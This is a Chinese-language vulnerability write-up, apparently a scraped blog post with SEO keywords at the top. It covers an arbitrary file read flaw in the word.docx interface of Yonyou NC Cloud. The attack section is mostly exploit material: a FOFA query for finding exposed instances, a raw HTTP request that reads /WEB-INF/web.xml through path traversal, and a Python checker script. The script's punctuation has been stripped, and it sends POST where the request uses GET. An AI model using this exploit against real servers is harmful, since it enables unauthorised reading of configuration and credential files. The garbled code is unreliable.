电商网站开发书籍,百度搜索引擎优化公司哪家强,怎么编写一个网站,什么是网络营销战略?网络营销战略的内容有哪些?声明 本文仅用于技术交流#xff0c;请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;文章作者不为此承担任何责任。
一、产品介绍
用友 NC Cloud#xff0c;大型企业数字化平台#xff…声明 本文仅用于技术交流请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责文章作者不为此承担任何责任。
一、产品介绍
用友 NC Cloud大型企业数字化平台 聚焦数字化管理、数字化经营、数字化商业帮助大型企业实现 人、财、物、客的全面数字化从而驱动业务创新与管理变革与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类68个细分行业涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案帮助企业全面落地数字化。
二、漏洞描述
用友NC Cloud word.docx接口存在任意文件读取漏洞
三、fofa语法 bodyUClient.dmg 四、漏洞复现 poc
GET /portal/docctr/open/word.docx?disp/WEB-INF/web.xml HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive 五、poc.py
import requestsdef verify(ip):url f{ip}/portal/docctr/open/word.docx?disp/WEB-INF/web.xmlheaders {User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1),Accept: * / *,Connection: Keep - Alive}try:response requests.post(url, headersheaders)print(response)# 验证成功输出相关信息if response.status_code 200:print(f{ip}存在用友NC word.docx接口任意文件读取漏洞)else:print(漏洞不存在)except Exception as e:passif __name__ __main__:self input(请输入目标主机IP地址)verify(self)
